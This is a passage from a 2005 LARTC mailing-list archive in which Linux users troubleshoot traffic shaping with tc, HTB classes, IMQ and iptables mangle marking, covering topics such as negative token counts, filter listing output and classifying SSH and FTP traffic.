Message-ID: <200501270924.48056.stef.coene@docum.org> On Thursday 27 January 2005 08:42, Denis Kot wrote: > I have this: > class htb 1:29 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst > 1599b cburst 1611b > Sent 33233 bytes 772 pkts (dropped 0, overlimits 0) > lended: 415 borrowed: 357 giants: 0 > tokens: -3756376 ctokens: 128779 > > or this: > class htb 1:21 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst > 1599b cburst 1611b > Sent 57554 bytes 618 pkts (dropped 0, overlimits 0) > lended: 193 borrowed: 425 giants: 0 > tokens: -484950 ctokens: 128779 > > and there is more like this > what=B4s wrong? Nothing. To understand what's going on, I need the tc commands you use to create the= =20 htb classes. > this is class for imq0 device (for me this is ingres device) and I have > this: imq0 Link encap:UNSPEC HWaddr > 00-00-00-FF-FF-00-00-00-00-00-00-00-00-00-00-00 > UP RUNNING NOARP MTU:1500 Metric:1 > RX packets:131111 errors:0 dropped:0 overruns:0 frame:0 > TX packets:123371 errors:0 dropped:0 overruns:0 carrier:0 > collisions:0 txqueuelen:30 > RX bytes:17694200 (16.8 Mb) TX bytes:15230834 (14.5 Mb) > > as you can see RX bytes doesn=B4t equal to TX bytes. what=B4s wrong? That means that some packets are dropped because you shape on that interfac= e. Stef From jacob martinson Thu Jan 27 18:00:14 2005 From: jacob martinson (jacob martinson) Date: Thu, 27 Jan 2005 12:00:14 -0600 Subject: [LARTC] question about filter priorities and "tc -d filter show" output Message-ID: <5b747959050127100044c0f@mail.gmail.com> The interface is setup like this: # tc qdisc del dev eth0 root # tc qdisc add dev eth0 root handle 1: htb default 2 # tc class add dev eth0 parent 1: classid 1:2 htb rate 20mbit ceil 20mbit If I add a second class and a filter to send traffic to it like this: # tc class add dev eth0 parent 1: classid 1:130 htb rate 1Mbit ceil 1Mbit # tc filter add dev eth0 protocol ip parent 1:0 prio 130 u32 match ip dst \ > 1.1.1.10 flowid 1:130 The output of "tc -d filter show dev eth0" makes sense to me and looks like this: filter parent 1: protocol ip pref 130 u32 filter parent 1: protocol ip pref 130 u32 fh 800: ht divisor 1 filter parent 1: protocol ip pref 130 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 1:130 match 0101010a/ffffffff at 16 If I add a third class and a filter for it, things start looking weird to me: # tc filter add dev eth0 protocol ip parent 1:0 prio 131 u32 match ip dst 1.1.1.11 \ > flowid 1:131 # tc class add dev eth0 parent 1: classid 1:132 htb rate 1Mbit ceil 1Mbit # tc -d filter show dev eth0 filter parent 1: protocol ip pref 130 u32 filter parent 1: protocol ip pref 130 u32 fh 801: ht divisor 1 filter parent 1: protocol ip pref 130 u32 fh 801::800 order 2048 key ht 801 bkt 0 flowid 1:131 match 0101010b/ffffffff at 16 filter parent 1: protocol ip pref 130 u32 fh 800: ht divisor 1 filter parent 1: protocol ip pref 130 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 1:130 match 0101010a/ffffffff at 16 filter parent 1: protocol ip pref 131 u32 filter parent 1: protocol ip pref 131 u32 fh 801: ht divisor 1 filter parent 1: protocol ip pref 131 u32 fh 801::800 order 2048 key ht 801 bkt 0 flowid 1:131 match 0101010b/ffffffff at 16 filter parent 1: protocol ip pref 131 u32 fh 800: ht divisor 1 filter parent 1: protocol ip pref 131 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 1:130 match 0101010a/ffffffff at 16 If N is the number of filters I have on the root qdisc, I get N-squared entries from the "show filter" command. Can someone explain how this works or point me to documentation that explains it? My system doesn't have a "tc-filters" manpage. Thanks! -Jacob From rsenykoff@harrislogic.com Thu Jan 27 19:50:11 2005 From: rsenykoff@harrislogic.com (rsenykoff@harrislogic.com) Date: Thu, 27 Jan 2005 13:50:11 -0600 Subject: [LARTC] Linux Bridge + QoS Shaper HOWTO available Message-ID: This is a multipart message in MIME format. --=_alternative 006CF72286256F96_= Content-Type: text/plain; charset="US-ASCII" I've created a pretty complete HOWTO on creating a Linux Bridge (using Fedora) to shape LAN <--> WAN traffic. It includes installation instructions, a script to configure the bridge (which you install as a service), and 2 scripts to configure the network interfaces using traffic control. http://www.burnpc.com/website.nsf/all/3a64a6369757819686256f960068ad75!OpenDocument If anyone has any questions or feedback I'm very interested. This configuration has evolved over the past 6 months and is somewhat tweaked. The highest priority traffic in my config, is of course, IAX2 (Asterisk VoIP protocol). Regards, Ron --=_alternative 006CF72286256F96_= Content-Type: text/html; charset="US-ASCII"
I've created a pretty complete HOWTO on creating a Linux Bridge (using Fedora) to shape LAN <--> WAN traffic. It includes installation instructions, a script to configure the bridge (which you install as a service), and 2 scripts to configure the network interfaces using traffic control.

http://www.burnpc.com/website.nsf/all/3a64a6369757819686256f960068ad75!OpenDocument

If anyone has any questions or feedback I'm very interested. This configuration has evolved over the past 6 months and is somewhat tweaked. The highest priority traffic in my config, is of course, IAX2 (Asterisk VoIP protocol).

Regards,

Ron
--=_alternative 006CF72286256F96_=-- From felix@ufomechanic.net Thu Jan 27 20:03:22 2005 From: felix@ufomechanic.net (felix) Date: Thu, 27 Jan 2005 20:03:22 +0000 Subject: [LARTC] How do I make the MARK target terminate in Iptables? Message-ID: <41F9490A.2090202@ufomechanic.net> Hi, I would like setting the mark to be a terminating rule in Iptables. Is there a patch or an argument/parameter that enables this behavior? Or exactly which line do I need to modify in the source code? I would massively prefer not to follow each mark rule with a second rule with the same matching criterion that simply terminates - that's too untidy for what I'm trying to do. Apologies, I'm in a big hurry so need a quick but robust fix. Many, many thanks, -Paul From Denis Kot Thu Jan 27 20:19:36 2005 From: Denis Kot (Denis Kot) Date: Thu, 27 Jan 2005 20:19:36 +0000 Subject: [LARTC] negative tokens In-Reply-To: <62916e5050127100345653a00@mail.gmail.com> References: <3cfad9ca0501262342794e99e4@mail.gmail.com> <62916e5050127100345653a00@mail.gmail.com> Message-ID: <3cfad9ca05012712196a08ab59@mail.gmail.com> ########## DEV0=3Dimq0 RATEUP=3D100 VPNS=3D30 /sbin/ip link set imq0 up tc qdisc add dev $DEV0 root handle 1: htb default 30 tc class add dev $DEV0 parent 1: classid 1:1 htb rate ${RATEUP}kbit ceil ${RATEUP}kbit tc class add dev $DEV0 parent 1:1 classid 1:30 htb rate $[$RATEUP/$VPNS]kbit ceil ${RATEUP}kbit ########### this is from /etc/ppp/ip-up.local: ########### # the followings parameters are available: # $1 =3D interface-name # $2 =3D tty-device # $3 =3D speed # $4 =3D local-IP-address # $5 =3D remote-IP-address # $6 =3D ipparam /sbin/iptables -t mangle -A PREROUTING -i $1 -d ! 192.168.0.0/16 -j IMQ --todev 0 /sbin/tc class add dev $DEV0 parent 1:1 classid 1:2${1/ppp/} htb rate $[$RATEUP/$VPNS]kbit ceil ${RATEUP}kbit /sbin/tc filter add dev $DEV0 protocol ip parent 1:0 prio 1 u32 match ip src $5 flowid 1:2${1/ppp/} ########### On Thu, 27 Jan 2005 19:03:47 +0100, Sujith Chennupati wrote: > it would be clear if you attach the code you are using with > may be some packets are not matched with the filter you specified and > going by deafult queue >=20 >=20 > On Thu, 27 Jan 2005 09:42:29 +0200, Denis Kot wrote= : > > I have this: > > class htb 1:29 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst > > 1599b cburst 1611b > > Sent 33233 bytes 772 pkts (dropped 0, overlimits 0) > > lended: 415 borrowed: 357 giants: 0 > > tokens: -3756376 ctokens: 128779 > > > > or this: > > class htb 1:21 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst > > 1599b cburst 1611b > > Sent 57554 bytes 618 pkts (dropped 0, overlimits 0) > > lended: 193 borrowed: 425 giants: 0 > > tokens: -484950 ctokens: 128779 > > > > and there is more like this > > what=B4s wrong? > > > > this is class for imq0 device (for me this is ingres device) and I have= this: > > imq0 Link encap:UNSPEC HWaddr > > 00-00-00-FF-FF-00-00-00-00-00-00-00-00-00-00-00 > > UP RUNNING NOARP MTU:1500 Metric:1 > > RX packets:131111 errors:0 dropped:0 overruns:0 frame:0 > > TX packets:123371 errors:0 dropped:0 overruns:0 carrier:0 > > collisions:0 txqueuelen:30 > > RX bytes:17694200 (16.8 Mb) TX bytes:15230834 (14.5 Mb) > > > > as you can see RX bytes doesn=B4t equal to TX bytes. what=B4s wrong? > > > > -- > > Denis Kot > > denis?jabber.org.by > > ICQ: 13680126 > > Mobil: +375 29 6-1234-78 > > _______________________________________________ > > LARTC mailing list / LARTC@mailman.ds9a.nl > > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > > >=20 > -- > sujith chandra chowdhary CHENNUPATI >=20 --=20 Denis Kot denis?jabber.org.by ICQ: 13680126 Mobil: +375 29 6-1234-78 From jacob martinson Thu Jan 27 22:04:58 2005 From: jacob martinson (jacob martinson) Date: Thu, 27 Jan 2005 16:04:58 -0600 Subject: [LARTC] question about filter priorities and "tc -d filter show" output In-Reply-To: <5b747959050127100044c0f@mail.gmail.com> References: <5b747959050127100044c0f@mail.gmail.com> Message-ID: <5b74795905012714043accb546@mail.gmail.com> forgot the [LARTC] prefix in the subject... On Thu, 27 Jan 2005 12:00:14 -0600, jacob martinson wrote: > The interface is setup like this: > # tc qdisc del dev eth0 root > # tc qdisc add dev eth0 root handle 1: htb default 2 > # tc class add dev eth0 parent 1: classid 1:2 htb rate 20mbit ceil 20mbit > > If I add a second class and a filter to send traffic to it like this: > # tc class add dev eth0 parent 1: classid 1:130 htb rate 1Mbit ceil 1Mbit > # tc filter add dev eth0 protocol ip parent 1:0 prio 130 u32 match ip dst \ > > 1.1.1.10 flowid 1:130 > > The output of "tc -d filter show dev eth0" makes sense to me and looks > like this: > filter parent 1: protocol ip pref 130 u32 > filter parent 1: protocol ip pref 130 u32 fh 800: ht divisor 1 > filter parent 1: protocol ip pref 130 u32 fh 800::800 order 2048 key > ht 800 bkt 0 flowid 1:130 > match 0101010a/ffffffff at 16 > > If I add a third class and a filter for it, things start looking weird to me: > > # tc filter add dev eth0 protocol ip parent 1:0 prio 131 u32 match ip > dst 1.1.1.11 \ > > flowid 1:131 > # tc class add dev eth0 parent 1: classid 1:132 htb rate 1Mbit ceil 1Mbit > # tc -d filter show dev eth0 > filter parent 1: protocol ip pref 130 u32 > filter parent 1: protocol ip pref 130 u32 fh 801: ht divisor 1 > filter parent 1: protocol ip pref 130 u32 fh 801::800 order 2048 key > ht 801 bkt 0 flowid 1:131 > match 0101010b/ffffffff at 16 > filter parent 1: protocol ip pref 130 u32 fh 800: ht divisor 1 > filter parent 1: protocol ip pref 130 u32 fh 800::800 order 2048 key > ht 800 bkt 0 flowid 1:130 > match 0101010a/ffffffff at 16 > filter parent 1: protocol ip pref 131 u32 > filter parent 1: protocol ip pref 131 u32 fh 801: ht divisor 1 > filter parent 1: protocol ip pref 131 u32 fh 801::800 order 2048 key > ht 801 bkt 0 flowid 1:131 > match 0101010b/ffffffff at 16 > filter parent 1: protocol ip pref 131 u32 fh 800: ht divisor 1 > filter parent 1: protocol ip pref 131 u32 fh 800::800 order 2048 key > ht 800 bkt 0 flowid 1:130 > match 0101010a/ffffffff at 16 > > If N is the number of filters I have on the root qdisc, I get > N-squared entries from the "show filter" command. > > Can someone explain how this works or point me to documentation that > explains it? My system doesn't have a "tc-filters" manpage. > > Thanks! > > -Jacob > From beatlelittle@yahoo.com.cn Fri Jan 28 00:55:31 2005 From: beatlelittle@yahoo.com.cn (CcM) Date: Fri, 28 Jan 2005 08:55:31 +0800 (CST) Subject: [LARTC] negative tokens In-Reply-To: <3cfad9ca05012712196a08ab59@mail.gmail.com> Message-ID: <20050128005531.85363.qmail@web15504.mail.cnb.yahoo.com> --0-655966520-1106873731=:71711 Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 8bit What does tokens and ctokens mean ?? thanks. Denis Kot wrote: ########## DEV0=imq0 RATEUP=100 VPNS=30 /sbin/ip link set imq0 up tc qdisc add dev $DEV0 root handle 1: htb default 30 tc class add dev $DEV0 parent 1: classid 1:1 htb rate ${RATEUP}kbit ceil ${RATEUP}kbit tc class add dev $DEV0 parent 1:1 classid 1:30 htb rate $[$RATEUP/$VPNS]kbit ceil ${RATEUP}kbit ########### this is from /etc/ppp/ip-up.local: ########### # the followings parameters are available: # $1 = interface-name # $2 = tty-device # $3 = speed # $4 = local-IP-address # $5 = remote-IP-address # $6 = ipparam /sbin/iptables -t mangle -A PREROUTING -i $1 -d ! 192.168.0.0/16 -j IMQ --todev 0 /sbin/tc class add dev $DEV0 parent 1:1 classid 1:2${1/ppp/} htb rate $[$RATEUP/$VPNS]kbit ceil ${RATEUP}kbit /sbin/tc filter add dev $DEV0 protocol ip parent 1:0 prio 1 u32 match ip src $5 flowid 1:2${1/ppp/} ########### On Thu, 27 Jan 2005 19:03:47 +0100, Sujith Chennupati wrote: > it would be clear if you attach the code you are using with > may be some packets are not matched with the filter you specified and > going by deafult queue > > > On Thu, 27 Jan 2005 09:42:29 +0200, Denis Kot wrote: > > I have this: > > class htb 1:29 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst > > 1599b cburst 1611b > > Sent 33233 bytes 772 pkts (dropped 0, overlimits 0) > > lended: 415 borrowed: 357 giants: 0 > > tokens: -3756376 ctokens: 128779 > > > > or this: > > class htb 1:21 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst > > 1599b cburst 1611b > > Sent 57554 bytes 618 pkts (dropped 0, overlimits 0) > > lended: 193 borrowed: 425 giants: 0 > > tokens: -484950 ctokens: 128779 > > > > and there is more like this > > what´s wrong? > > > > this is class for imq0 device (for me this is ingres device) and I have this: > > imq0 Link encap:UNSPEC HWaddr > > 00-00-00-FF-FF-00-00-00-00-00-00-00-00-00-00-00 > > UP RUNNING NOARP MTU:1500 Metric:1 > > RX packets:131111 errors:0 dropped:0 overruns:0 frame:0 > > TX packets:123371 errors:0 dropped:0 overruns:0 carrier:0 > > collisions:0 txqueuelen:30 > > RX bytes:17694200 (16.8 Mb) TX bytes:15230834 (14.5 Mb) > > > > as you can see RX bytes doesn´t equal to TX bytes. what´s wrong? > > > > -- > > Denis Kot > > denis?jabber.org.by > > ICQ: 13680126 > > Mobil: +375 29 6-1234-78 > > _______________________________________________ > > LARTC mailing list / LARTC@mailman.ds9a.nl > > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > > > > -- > sujith chandra chowdhary CHENNUPATI > -- Denis Kot denis?jabber.org.by ICQ: 13680126 Mobil: +375 29 6-1234-78 _______________________________________________ LARTC mailing list / LARTC@mailman.ds9a.nl http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ --------------------------------- Do You Yahoo!? ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-655966520-1106873731=:71711 Content-Type: text/html; charset=gb2312 Content-Transfer-Encoding: 8bit
What does tokens and ctokens mean ??
thanks.

Denis Kot <denis.kot@gmail.com> wrote:
##########
DEV0=imq0
RATEUP=100
VPNS=30

/sbin/ip link set imq0 up

tc qdisc add dev $DEV0 root handle 1: htb default 30

tc class add dev $DEV0 parent 1: classid 1:1 htb rate ${RATEUP}kbit
ceil ${RATEUP}kbit

tc class add dev $DEV0 parent 1:1 classid 1:30 htb rate
$[$RATEUP/$VPNS]kbit ceil ${RATEUP}kbit
###########

this is from /etc/ppp/ip-up.local:

###########

# the followings parameters are available:
# $1 = interface-name
# $2 = tty-device
# $3 = speed
# $4 = local-IP-address
# $5 = remote-IP-address
# $6 = ipparam

/sbin/iptables -t mangle -A PREROUTING -i $1 -d ! 192.168.0.0/16 -j
IMQ --todev 0
/sbin/tc class add dev $DEV0 parent 1:1 classid 1:2${1/ppp/} htb rate
$[$RATEUP/$VPNS]kbit ceil ${RATEUP}kbit
/sbin/tc filter add dev $DEV0 protocol ip parent 1:0 prio 1 u32 match
ip src $5 flowid 1:2${1/ppp/}
###########

On Thu, 27 Jan 2005 19:03:47 +0100, Sujith Chennupati
wrote:
> it would be clear if you attach the code you are using with
> may be some packets are not matched with the filter you specified and
> going by deafult queue
>
>
> On Thu, 27 Jan 2005 09:42:29 +0200, Denis Kot wrote:
> > I have this:
> > class htb 1:29 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst
> > 1599b cburst 1611b
> > Sent 33233 bytes 772 pkts (dropped 0, overlimits 0)
> > lended: 415 borrowed: 357 giants: 0
> > tokens: -3756376 ctokens: 128779
> >
> > or this:
> > class htb 1:21 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst
> > 1599b cburst 1611b
> > Sent 57554 bytes 618 pkts (dropped 0, overlimits 0)
> > lended: 193 borrowed: 425 giants: 0
> > tokens: -484950 ctokens: 128779
> >
> > and there is more like this
> > what´s wrong?
> >
> > this is class for imq0 device (for me this is ingres device) and I have this:
> > imq0 Link encap:UNSPEC HWaddr
> > 00-00-00-FF-FF-00-00-00-00-00-00-00-00-00-00-00
> > UP RUNNING NOARP MTU:1500 Metric:1
> > RX packets:131111 errors:0 dropped:0 overruns:0 frame:0
> > TX packets:123371 errors:0 dropped:0 overruns:0 carrier:0
> > collisions:0 txqueuelen:30
> > RX bytes:17694200 (16.8 Mb) TX bytes:15230834 (14.5 Mb)
> >
> > as you can see RX bytes doesn´t equal to TX bytes. what´s wrong?
> >
> > --
> > Denis Kot
> > denis?jabber.org.by
> > ICQ: 13680126
> > Mobil: +375 29 6-1234-78
> > _______________________________________________
> > LARTC mailing list / LARTC@mailman.ds9a.nl
> > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
> >
>
> --
> sujith chandra chowdhary CHENNUPATI
>


--
Denis Kot
denis?jabber.org.by
ICQ: 13680126
Mobil: +375 29 6-1234-78
_______________________________________________
LARTC mailing list / LARTC@mailman.ds9a.nl
http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/


Do You Yahoo!?
×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-655966520-1106873731=:71711-- From beatlelittle@yahoo.com.cn Fri Jan 28 01:44:20 2005 From: beatlelittle@yahoo.com.cn (CcM) Date: Fri, 28 Jan 2005 09:44:20 +0800 (CST) Subject: [LARTC] Ssh flow does not go into correct class. Help! In-Reply-To: Message-ID: <20050128014421.57144.qmail@web15507.mail.cnb.yahoo.com> --0-1665266126-1106876660=:42398 Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 8bit Look at this case, it even does no work! (following command run on ssh server.) tc qdisc add dev eth0 root handle 1: htb default 13 tc class add dev eth0 parent 1: classid 1:1 htb rate 500kbit ceil 500kbit tc class add dev eth0 parent 1:1 classid 1:11 htb rate 100kbit ceil 500kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:12 htb rate 100kbit ceil 500kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:13 htb rate 100kbit ceil 500kbit prio 1 tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5 tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5 tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5 iptables -t mangle -A OUTPUT -d 10.190.6.16 -j MARK --set-mark 20 iptables -t mangle -A OUTPUT -d 10.190.6.16 -j RETURN tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11 I expect data from ssh server to my client 10.190.6.16 should goes into 1:11, and other data goes into default 1:13. But when I use ssh client on other machine(not 10.190.6.16), the data seems also goes into 1:11(I got this from tc -s -d class show dev eth0). Why? "Catalin(ux aka Dino) BOIE" wrote: On Thu, 27 Jan 2005, CcM wrote: > Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why? > > tc qdisc add dev eth0 root handle 1: htb default 13 > tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1 > tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1 > tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1 > tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1 > tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5 > tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5 > tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5 > > iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20 > iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN > > iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j MARK --set-mark 21 > iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN I bet you use passive mode in ftp so you get a weird port, not ftp-data (20). ftp is tricky to match. You can use this: iptables -t mangle -A POSTROUTING -d x.x.x.x -m helper --helper ftp \ -j MARK --set-mark 21 This will mark with 21 all ftp control+data connections. > > tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11 > tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12 > > > "Catalin(ux aka Dino) BOIE" wrote: > On Wed, 26 Jan 2005, CcM wrote: > >> It does work! Thanks! >> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle? >> >> "Catalin(ux aka Dino) BOIE" wrote: >> Use: >> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \ >> --set-mark 20 > > Because local generated packets doesn't go through PREROUTING. > But, best is to use OUTPUT. > >> >> --- >> Catalin(ux aka Dino) BOIE >> catab at deuroconsult.ro >> http://kernel.umbrella.ro/ >> _______________________________________________ >> LARTC mailing list / LARTC@mailman.ds9a.nl >> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ >> >> >> >> --------------------------------- >> Do You Yahoo!? >> ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ > > --- > Catalin(ux aka Dino) BOIE > catab at deuroconsult.ro > http://kernel.umbrella.ro/ > > > --------------------------------- > Do You Yahoo!? > ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ --------------------------------- Do You Yahoo!? ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-1665266126-1106876660=:42398 Content-Type: text/html; charset=gb2312 Content-Transfer-Encoding: 8bit
Look at this case, it even does no work!
 
(following command run on ssh server.)
tc qdisc add dev eth0 root handle 1: htb default 13
tc class add dev eth0 parent 1: classid 1:1 htb rate 500kbit ceil 500kbit
tc class add dev eth0 parent 1:1 classid 1:11 htb rate 100kbit ceil 500kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:12 htb rate 100kbit ceil 500kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:13 htb rate 100kbit ceil 500kbit prio 1
tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5
 
iptables -t mangle -A OUTPUT -d 10.190.6.16 -j MARK --set-mark 20
iptables -t mangle -A OUTPUT -d 10.190.6.16 -j RETURN
 
tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11

I expect data from ssh server to my client 10.190.6.16 should goes into 1:11, and other data goes into default 1:13. But when I use ssh client on other machine(not 10.190.6.16), the data seems also goes into 1:11(I got this from tc -s -d class show dev eth0). Why?

"Catalin(ux aka Dino) BOIE" <util@deuroconsult.ro> wrote:
On Thu, 27 Jan 2005, CcM wrote:

> Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why?
>
> tc qdisc add dev eth0 root handle 1: htb default 13
> tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1
> tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1
> tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1
> tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1
> tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
> tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
> tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5
>
> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20
> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN
>
> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j MARK --set-mark 21
> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN

I bet you use passive mode in ftp so you get a weird port, not ftp-data
(20). ftp is tricky to match. You can use this:
iptables -t mangle -A POSTROUTING -d x.x.x.x -m helper --helper ftp \
-j MARK --set-mark 21
This will mark with 21 all ftp control+data connections.

>
> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12
>
>
> "Catalin(ux aka Dino) BOIE" wrote:
> On Wed, 26 Jan 2005, CcM wrote:
>
>> It does work! Thanks!
>> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle?
>>
>> "Catalin(ux aka Dino) BOIE" wrote:
>> Use:
>> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \
>> --set-mark 20
>
> Because local generated packets doesn't go through PREROUTING.
> But, best is to use OUTPUT.
>
>>
>> ---
>> Catalin(ux aka Dino) BOIE
>> catab at deuroconsult.ro
>> http://kernel.umbrella.ro/
>> _______________________________________________
>> LARTC mailing list / LARTC@mailman.ds9a.nl
>> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
>>
>>
>>
>> ---------------------------------
>> Do You Yahoo!?
>> ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ
>
> ---
> Catalin(ux aka Dino) BOIE
> catab at deuroconsult.ro
> http://kernel.umbrella.ro/
>
>
> ---------------------------------
> Do You Yahoo!?
> ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/


Do You Yahoo!?
×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-1665266126-1106876660=:42398-- From rio@martin.mu Fri Jan 28 13:47:35 2005 From: rio@martin.mu (Rio Martin.) Date: Fri, 28 Jan 2005 13:47:35 +0000 Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table. In-Reply-To: <41F8E0A1.4060108@dsl.pipex.com> References: <200501191657.15767.rio@martin.mu> <200501261804.53584.rio@martin.mu> <41F8E0A1.4060108@dsl.pipex.com> Message-ID: <200501281347.35551.rio@martin.mu> On Thursday 27 January 2005 12:37, Andy Furniss wrote: > > I'll make it simple for you as possible. > > i have linux box which have eth0 220.1.1.1 as primary ip and aliasses: > > eth0:1 192.168.1.1 , eth0:1 192.168.1.2 > > Both 192.168.1.1 & 192.168.1.2 NATed to 220.1.1.1 > > OKay, now my question is: > > How do i manage and limit traffic generated from those ips (192.168.1.1 & > > 192.168.1.2) ? Not just traffic outside, but traffic coming to those ips > > from Internet. > > I found it so difficult because traffic coming from internet to eth0 will > > be using 220.1.1.1 not 192.168.x.x > > If you use IMQ and get it to hook after NAT in PREROUTING then forwarded > traffic should have been denatted and have local addresses. You can use > TC filters to classify for htb etc. > Traffic from internet to squid will probably have 220. IP address. Thats what i'm worrying of, the ip address from internet would be 220.1.1.1, not 192.168.x.x IMQ with iptables marking unable to mark the packets to 192.168.x.x > If you want to try a way without IMQ then AIUI you can patch squid so > you can classify hit/miss traffic and then you could shape traffic as > egress on eth0. I don't use squid - but I assume here it limits the rate > it pulls miss pages to the rate that client requests. > http://www.docum.org/docum.org/faq/cache/65.html I ve tried this before, but never succeed. I didnt know where should i attach the 10:100 class. In the document, just told to add this class in tc, without giving some information which interface should i attach this class. Regards, Rio Martin. From raptor@tvskat.net Fri Jan 28 07:12:39 2005 From: raptor@tvskat.net (raptor@tvskat.net) Date: Fri, 28 Jan 2005 09:12:39 +0200 Subject: [LARTC] iproute-save ? Message-ID: <20050128091239.102bec97@bugs> Anyone to know iproute-save, iproute-restore like script similar iptables-save/restore ? that stores everytihng routes,rules,tables everything ... then init.d-script that among other things stores the state on shutdown :") (thats easy then) ----- http://linuxtoday.com/news_story.php3?ltsn=2004-12-08-004-32-OS-BZ-DT-0005 snip> MS Office is popular in the same way as heart disease is the most popular way to die. From util@deuroconsult.ro Fri Jan 28 08:16:03 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Fri, 28 Jan 2005 10:16:03 +0200 (EET) Subject: [LARTC] Ssh flow does not go into correct class. Help! In-Reply-To: <20050128014421.57144.qmail@web15507.mail.cnb.yahoo.com> References: <20050128014421.57144.qmail@web15507.mail.cnb.yahoo.com> Message-ID: This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. ---1646943047-1848846197-1106900163=:3893 Content-Type: TEXT/PLAIN; charset=iso-8859-1; format=flowed 